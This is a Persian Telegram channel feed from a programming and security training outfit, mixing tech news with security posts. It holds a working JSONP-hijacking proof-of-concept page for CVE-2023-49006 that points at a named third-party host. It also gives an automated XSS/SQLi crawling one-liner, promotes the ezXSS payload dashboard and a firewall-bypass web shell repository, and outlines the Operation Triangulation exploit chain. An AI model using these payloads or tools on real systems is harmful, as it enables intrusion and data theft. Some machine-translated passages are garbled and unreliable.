KASRAONE
1.03K subscribers
135 photos
6 videos
14 files
252 links
...................﷽........................
🐞باگ‌ها را شکار کنیم، کد را بهتر کنیم👨‍💻
برگزاری دوره‌های برنامه نویسی و امنیت
سایبری

آدرس سایت 🌐
kasraone.ir
تلفن☎️:
۰۵۱۴-۳۲۲۴۱۶۸
آیدی پشتیبان
🆔️ : @academykasraone

آدرس گروه کسری وان

🌐 : @kasraonegap
Download Telegram
برترین زبان های برنامه نویسی برای یادگیری در سال 2023


1. جاوا اسکریپت
- learnjavascript.آنلاین
- learn-js.org

2. جاوا
- learnjavaonline.org
- javatpoint.com

3. C#
- learncs.org
- w3schools.com

4. تایپ اسکریپت
- Typescriptlang.org
- learntypescript.توسعه دهنده


- rust-lang.org
- exercism.org




        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
👍3
KASRAONE
Photo
به روز رسانی انتشار Poe

1. اضافه کردن یک پایگاه دانش به ربات
سازندگان Poe اکنون می توانند ربات های خود را از طریق پایگاه دانش بهبود بخشند تا کاربران را با یک تجربه منحصر به فرد و سفارشی تر فراهم کنند.این روش ارتقا یافته می تواند دقت پاسخ ها را بهبود بخشد ، توهمات را کاهش دهد و تجربه تعاملی کاربر را بهبود بخشد.پایگاه دانش می تواند با هر llm پایه (مدل زبان بزرگ) ، از جمله GPT-3.5 ، GPT-4 ، Claude Instant ، Claude 2 یا Llama 2 استفاده شود و برای همه کاربران Poe قابل دسترسی است و می تواند پولدار شود.

2. اضافه شدن مدل تولید تصویر
ما همچنین دو ژنراتور تصویر قدرتمند اضافه کرده ایم: DALL-e-3 و Playground v2.این ربات ها می توانند برای ایجاد تصاویر با کیفیت بالا و خیره کننده بر اساس دستورات ساده استفاده شوند.DALL-e-3 همچنین می تواند به عنوان پایه ای برای ساخت ربات خود و به اشتراک گذاری آن با جهان استفاده شود (توجه: DALL-e-3 فقط برای مشترکین است).

3. گسترش بین المللی
Poe در حال حاضر در 8 زبان جدید (فرانسه ، آلمانی ، ایتالیایی ، کره ای ، پرتغالی ، چینی ساده ، چینی سنتی و اسپانیایی) در دسترس است که تمام سیستم عامل ها را پوشش می دهد.این یک گام مهم در هدف ما است که کاربران بیشتری را در سراسر جهان با توانایی کشف هوش مصنوعی به زبان مادری خود فراهم کنیم.

4. به روز رسانی حریم خصوصی
ما یک آیکون حریم خصوصی جدید را برای کمک به شما در درک بهتر محرمانه بودن مکالمات ربات راه اندازی کرده ایم.اکنون هر رباتی دارای لوگوی privacy shield است که سطح حریم خصوصی چت شما را نشان می دهد: یک نماد کاملا رنگی به این معنی است که سازنده ربات نمی تواند محتوای چت شما را بخواند ، در حالی که یک نماد نیمه رنگی به این معنی است که یک ربات سرور خارجی فقط می تواند به چت ناشناس شما دسترسی پیدا کند history.In در همه موارد ، هویت شما خصوصی خواهد ماند.لطفا در مرکز حریم خصوصی ما بیشتر بدانید.

5. آپدیت اندروید
ما به طور مداوم تجربه اندروید را بهبود می بخشیم و برخی از ویژگی های جدید را اضافه می کنیم ، از جمله توانایی ایجاد و ویرایش ربات ها در حال حاضر.کاربران همچنین می توانند ربات پیش فرض را تنظیم کنند و از دکمه جدید retry برای بازسازی سریع نتایج هر ربات با یک کلیک استفاده کنند.

منبع: Poe邮件




        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
1👍1
فرا رسیدن ایام شهادت حضرت فاطمه (س) بر همه شیعیان تسلیت🖤🖤

شرکت کسری ارتباط پارس
16😁3
همان سیاست اصلی مانع از دیدن جاوا اسکریپت یک وب سایت در نتیجه درخواست انجام شده به یک دامنه دیگر می شود. این ضروری است چون این درخواست هر کوکی ذخیره شده برای آن دامنه را همراه خود می فرستد. اگر شما در سایت دیگر تأیید هویت شوید و از یک سایت مخرب بازدید کنید ، پس صفحه evil می تواند ، مثلا ، خلاصه حساب شما را از سایت دیگر درخواست کند.


ادامه مقاله :
LINK:

Plain text considered harmful: A cross-domain exploit





        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
KASRAONE
Photo
🔴 باج افزاره گربه سیاه

اف بي آي نرم افزار باج گربه سياه رو از کار انداخت و يه ابزار رمزگشايي مجاني رو منتشر کرد

وزارت دادگستری ایالات متحده رسما از تخریب عملیات باج افزار BlackCat خبر داد و یک ابزار رمزگشایی را منتشر کرد که قربانیان می توانند برای دسترسی مجدد به فایل های قفل شده توسط بدافزار استفاده کنند.

اسناد دادگاه نشان می دهد که اداره تحقیقات فدرال ایالات متحده (FBI) یک مخبر انسانی محرمانه (CHS) را به عنوان یک عضو وابسته به BlackCat استخدام کرده و به پنل شبکه ای که برای مدیریت قربانیان باند استفاده می شود دسترسی پیدا کرده است. این یک مورد هک کردن هکرها است.

BlackCat (BlackCat) ، همچنین به عنوان ALPHV و Noberus شناخته می شود ، در ابتدا در دسامبر 2021 ظاهر شد و از آن زمان به دومین نسخه فعال باج افزار به عنوان یک سرویس (باج به عنوان یک سرویس) در جهان تبدیل شده است LockBit.It همچنین اولین نرم افزار باج گیری مبتنی بر زبان زنگ است که در طبیعت کشف شده است.

اف بی آی گفت که با ده ها قربانی در ایالات متحده برای اجرای رویه های رمزگشایی که آنها را از مطالبات باج به مبلغ حدود 68 میلیون دلار آمریکا معاف می کند ، کار کرده است و همچنین بینش شبکه کامپیوتری نرم افزار باج را به دست آورده است ، و آن را قادر می سازد تا 946 جفت کلید عمومی/خصوصی را که برای میزبانی وب سایت TOR که توسط سازمان اداره می شود و از بین بردن آن استفاده می شود ، جمع آوری کند.



LINK

https://thehackernews.com/2023/12/fbi-takes-down-blackcat-ransomware.html?m=1

                       
        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
1
شب یلدا به همه دوستان و کاربران عزیز کسری وان مبارک

شرکت کسری ارتباط پارس
3
🔴 ترفنده سریع برای درک UDP VS TCP 😁



                       
        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
😁6👍2
🔴 Android Penetration  Part 1

MEDIUOM

https://medium.com/p/b82b0d06e360



                       
        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
KASRAONE
Photo
«پیچیده‌ترین» زنجیره حمله آیفون که تا به حال ایجاد شده است - از چهار آسیب‌پذیری روز صفر برای ایجاد یک اکسپلویت با کلیک صفر استفاده می‌کند.

بین سال‌های 2019 و دسامبر 2022، یک آسیب‌پذیری بسیار پیشرفته iMessage ظاهر شد که محققان امنیتی Kaspersky که در نهایت آن را کشف کردند، آن را Operation Triangulation نامیدند. اکنون، آن‌ها آنچه را که درباره «پیچیده‌ترین زنجیره حمله‌ای که تا به حال دیده‌اند» به اشتراک می‌گذارند.

امروز در کنفرانس ارتباطات آشوب، محققان امنیتی کسپرسکی بوریس لارین، لئونید بزویچنکو و گئورگی کوچرین در مورد "عملیات مثلث" سخنرانی کردند. این اولین باری است که این سه نفر «تمام آسیب‌پذیری‌ها و جزئیات آسیب‌پذیری مورد استفاده در حملات پیشرفته iMessage را به صورت عمومی افشا می‌کنند».

محققان همچنین تمام کارهای خود را امروز در وبلاگ Kaspersky SecureList به اشتراک گذاشتند.

در زیر زنجیره حمله کامل و پیچیده شامل چهار آسیب‌پذیری روز صفر مورد استفاده برای دسترسی ریشه به دستگاه قربانی است:
• مهاجم یک پیوست iMessage مخرب ارسال می کند، که برنامه بدون نشان دادن هیچ نشانه ای به کاربر، آن را پردازش می کند.

• این پیوست از آسیب‌پذیری اجرای کد از راه دور فقط برای اپل، CVE-2023-41990 در دستورالعمل فونت ADJUST TrueType سوء استفاده می‌کند. این دستورالعمل از اوایل دهه نود وجود داشت تا زمانی که یک پچ آن را حذف کرد.

• از برنامه نویسی بازگشتی/پرش گرا و چندین مرحله نوشته شده در زبان پرس و جو NSExpression/NSPredicate برای اجرای یک اکسپلویت افزایش امتیاز نوشته شده در جاوا اسکریپت با وصله محیط کتابخانه JavaScriptCore استفاده می کند.

• این کد اکسپلویت جاوا اسکریپت مبهم شده است تا کاملاً ناخوانا شود و اندازه آن تا حد امکان کاهش یابد. با این وجود، تقریباً شامل 11000 خط کد است که عمدتاً برای تجزیه و دستکاری حافظه JavaScriptCore و هسته است.

• از ویژگی اشکال زدایی DollarVM ($vm) JavaScriptCore استفاده می کند تا توانایی دستکاری حافظه JavaScriptCore و اجرای توابع API بومی را از اسکریپت ها به دست آورد.

• این برنامه برای پشتیبانی از آیفون های قدیمی و جدید طراحی شده است و دارای ویژگی دور زدن کد تأیید هویت اشاره گر (PAC) برای بهره برداری از مدل های اخیر است.

• از آسیب پذیری سرریز اعداد صحیح CVE-2023-32434 در فراخوانی های سیستم نقشه برداری حافظه XNU (mach_make_memory_entry و vm_map) برای دسترسی خواندن/نوشتن به کل حافظه فیزیکی دستگاه در سطح کاربر سوء استفاده می کند.

• از رجیسترهای I/O (MMIO) نگاشت شده حافظه سخت افزاری برای دور زدن لایه حفاظتی صفحه (PPL) استفاده می کند. این مشکل به عنوان CVE-2023-38606 کاهش یافته است.

• پس از اینکه تمام آسیب‌پذیری‌ها مورد سوء استفاده قرار گرفتند، اکسپلویت جاوا اسکریپت می‌تواند هر کاری را که می‌خواهد با دستگاه انجام دهد، از جمله اجرای نرم‌افزارهای جاسوسی، اما مهاجم تصمیم می‌گیرد: (الف) فرآیند IMAgent را راه‌اندازی کند و ابزار مؤثری را تزریق کند که آثار سوء استفاده را بر روی دستگاه پاک کند. بار دستگاه؛ (ب) فرآیند سافاری را در حالت مخفی اجرا می کند و آن را به یک صفحه وب با محتوای مرحله بعدی ارسال می کند.

• یک اسکریپت در صفحه وب وجود دارد که قربانی را احراز هویت می کند و در صورت عبور از چک، مرحله بعدی را دریافت می کند: Safari exploit.

• آسیب پذیری سافاری از CVE-2023-32435 برای اجرای کد پوسته سوء استفاده می کند.

• Shellcode یک اکسپلویت هسته دیگری را در قالب یک فایل شی Mach اجرا کرد. از همان آسیب پذیری ها استفاده می کند: CVE-2023-32434 و CVE-2023-38606. همچنین از نظر اندازه و عملکرد بسیار بزرگ است، اما چیزی شبیه یک اکسپلویت هسته نوشته شده در جاوا اسکریپت نیست. برخی از بخش های مربوط به اکسپلویت فوق برای هر دو مشترک است. با این حال، بسیاری از کد آن نیز به تجزیه و دستکاری حافظه هسته اختصاص دارد. این شامل ابزارهای مختلف پس از بهره برداری است که عمدتاً استفاده نمی شوند.

• این آسیب‌پذیری امتیازات ریشه را به دست می‌آورد و به مراحل دیگری که نرم‌افزارهای جاسوسی بارگیری می‌شوند ادامه می‌دهد. در پست قبلی به این مراحل پرداختیم.

LINK

https://9to5mac.com/2023/12/27/most-sophisticated-iphone-attack-chain-ever-seen/

                       
        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
2
🔍 نکات Bounty Bug: خزیدن پارامترها با Katana برای بردهای سریع XSS/SQLI!

🚀 وقتی صحبت از شکار کارآمد باگ می شود، خزیدن فعال می تواند بازی را تغییر دهد. یکی از ابزارهایی که من به آن تکیه می کنم کاتانا است که به بازیابی URL ها و پارامترها برای آزمایش کامل در برابر XSS، SQLI، SSTI و موارد دیگر کمک می کند.
👉 در اینجا یک خط یک خطی است که این روند را آغاز می کند:
> katana -u http://domain.com -silent -d 15 -rl 500 -jc -c 20 -kf all -ct 2m -sf qurl -o urls.txt
> urless -i urls.txt -o output.txt
> nuclei -l output.txt -t fuzzing-templates/ -silent

🔑 مرحله بعدی چیست؟ URL هایی را که از خزیدن فعال به دست آورده اید، بردارید، موارد تکراری را با urless حذف کنید و در بررسی های XSS، SQLI و SSTI خود قرار دهید. این استراتژی سطح حمله شما را گسترش می‌دهد و تشخیص آسیب‌پذیری‌ها و تضمین آن بردهای سریع را آسان‌تر می‌کند.

💡موارد حذفی: استفاده از قابلیت‌های کاتانا می‌تواند به شما کمک کند تا مسائل پنهان را به طور موثر کشف کنید و درآمدهای خود را از مزایای باگ تقویت کنید.
#KASRAONE #Scan
32
🔴 Autorize



Link GitHub 🐈


https://github.com/Quitten/Autorize

Autorize
یک تمدید تشخیص اجرای مجوز خودکار برای Burp Suite است. این به زبان پایتون توسط باراک تاویلی ، یک متخصص امنیت برنامه نوشته شده است. Autorize برای کمک به تست کنندگان امنیتی با انجام تست های مجوز خودکار طراحی شده است. با آخرین نسخه در حال حاضر Autorize همچنین تست های احراز هویت خودکار
را انجام می دهد.


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
👍1
نیویورک تایمز از OpenAI و مایکروسافت به دلیل نقض حق چاپ شکایت کرده است

نیویورک تایمز از OpenAI و مایکروسافت شکایت کرده و می‌گوید این شرکت‌ها اکنون با «کپی کردن و استفاده از میلیون‌ها مقاله» از مقاله‌های این نشریه برای ساخت مدل‌های هوش مصنوعی خود، به طور مستقیم با محتوای نشریه رقابت می‌کنند. و خواستار این شدند که آنها در قبال "میلیاردها دلار خسارت قانونی و واقعی" به دلیل کپی برداری ادعایی از آثارشان مسئول باشند.

طبق این شکایت، تایمز ادعا می‌کند که مدل‌های زبان بزرگ OpenAI و مایکروسافت (LLM) که ChatGPT و Copilot را هدایت می‌کنند، «قادر به تولید خروجی هستند که دقیقاً محتوای تایمز را تکرار می‌کند، محتوای آن را از نزدیک خلاصه می‌کند و سبک ارائه آن را تقلید می‌کند. این سازمان رسانه ای گفت که این امر رابطه تایمز با خوانندگان را "کاهش و آسیب رسانده" و در عین حال آن را از "اشتراک، مجوز، تبلیغات و درآمد وابسته" محروم کرده است.

🔴 ادامه خبر در لینک

LINK


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
😁1😍1
(CSRF)



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
1
KASRAONE
(CSRF)         ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣          ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ                         K1                   kasraone
🔴 CVE-2023-49006


آسیب پذیری Cross Site Request Forgery (CSRF) در Phpsysinfo نسخه 3.4.3 به مهاجم از راه دور اجازه می دهد تا اطلاعات حساس را از طریق یک صفحه دستکاری شده در فایل XML.php به دست آورد.

phpsysinfo v3.4.3
دارای آسیب پذیری JSONP است. فایل XML.php دارای آسیب پذیری JSONP hijacking است. هنگامی که کاربر از صفحه ای بازدید می کند که با دقت توسط مهاجم ساخته شده است، داده های JSON به دست می آید و برای مهاجم ارسال می شود.
حالا فرآینده این حمله چطوری است ؟
به سادگی از یک فایل PHP برای ارسال داده های JSON بازیابی شده به سرور خود با استفاده از XMLHttpRequest استفاده می کند.

در اینجا کد HTML برای اثبات فایل مفهومی آمده است:

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<script>
function dezsbrxdio(data){ alert(JSON.stringify(data)); }
</script>
<script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio">
</script>
</body>
</html>



        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
5👍2😍1
یک شرکت فرانسوی اولین آینه هوشمند هوش مصنوعی جهان را عرضه کرد: این آینه می تواند احساسات کاربران را شناسایی کند و استرس را از بین ببرد.

در طول نمایشگاه CES 2024، یک شرکت فناوری سلامت هوشمند فرانسوی به نام Baracoda اولین آینه هوشمند هوش مصنوعی جهان BMind را منتشر کرد. طبق بیانیه رسمی، این آینه ای است که مخصوص سلامت روان طراحی شده است که می تواند احساسات را شناسایی کرده و به مدیریت استرس کمک کند.

از نظر تعامل، کاربران می توانند از طریق صدا، حرکات و غیره با آینه ارتباط برقرار کنند، به عنوان مثال، مشت زدن یا ضربه زدن می تواند به منوی اصلی بازگردد و ژست برای انتخاب محتوای فعلی یک انگشت است.

Link

https://www.ithome.com/0/743/950.htm


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
👍1😍1
🔴 ezXSS

Git Hub : 🐈


Easy to use dashboard with settings, statistics, payloads, view/share/search reports
🆕 Persistent XSS sessions with reverse proxy aslong as the browser is active
Unlimited users with permissions to personal payloads & their reports
Instant alerts via mail, Telegram, Slack, Discord or custom callback URL
Custom javascript payloads
Custom payload links to distinguish insert points
Extract additional pages, block, whitelist and other filters
Secure your login with Two-factor (2FA)

The following information can be collected on a vulnerable page:

The URL of the page

IP Address
Any page referer (or share referer)


LINKTOOLS




        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
👍2
WebShells

Prvi8 PHP AND ASPX Web Shells ( Bypasser Web Shells ) firewall Bypass Shells (web shells)
Imunify360 ByPass ( 403.php )

Git Hub 🐈

https://github.com/sagsooz/Bypass-Webshell


        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone
2
🔴 Blind SSRF to Port Scanning through response time


LINK MEDIUM




        ♡ ⠀⠀ 〇⠀  ⠀ ⎙⠀‌ ‌ ⌲⁣
         ˡⁱᵏᵉ  ᶜᵒᵐᵐᵉⁿᵗ  ˢᵃᵛᵉ  ˢʰᵃʳᵉ

                        K1
                  kasraone